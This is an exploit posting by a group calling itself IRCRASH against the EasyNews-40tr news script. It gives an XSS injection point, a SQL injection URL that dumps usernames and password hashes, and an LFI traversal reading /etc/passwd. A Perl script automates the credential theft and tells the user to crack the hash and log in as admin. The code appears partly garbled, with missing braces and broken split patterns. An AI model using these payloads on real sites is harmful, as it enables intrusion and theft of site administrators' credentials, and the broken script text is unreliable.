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EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)

####                               EasyNews-40tr                                 ####
####        Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)      ####
#                                                                                   #
#Discovered by : IRCRASH By Dr.Crash                                                #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#                                                                                   #
#Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip #
#                                                                                   #
#                                   < XSS >                                         #
#XSS Address : http://Sitename/staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_pupublish&read=
#                                                                                   #
#                                   < SQL >                                         #
#SQL Address : http://Sitename/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers
#                                                                                   #
#                                   < LFI >                                         #
#SQL Address : http://Sitename/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00
#                                                                                   #
# Our site : Http://IRCRASH.COM #

use LWP;
use HTTP::Request;
use Getopt::Long;

sub header
print "
*       EasyNews-40tr Sql Injection exploit        *
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH TEAM BY Dr.Crash          *
*Exploited by : IRCRASH TEAM BY Dr.Crash           *
*Our Site : IRCRASH.COM                            *

sub usage
  print "
* Usage : perl $0 -url http://Sitename/

my %parameter = ();
GetOptions(\%parameter, "url=s");

$url = $parameter{"url"};

if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = "/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers";
sub Exploit()
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";

my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/' );
$req->header("content-length" => $contlen);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

#Debug Modus delete # at beginning of next line
#print $content;

@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];

@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];

if(!$name && !$password)
print "\n\n";
print "!Exploit failed ! :(\n\n";

print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Md5 Password And Login In : $url/admin/\n";
print "Enjoy My friend .....\n";


print "
*       EasyNews-40tr Sql Injection exploit        *
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH TEAM BY Dr.Crash          *
*Exploited by : IRCRASH TEAM BY Dr.Crash           *
print "\n\nExploiting...\n";

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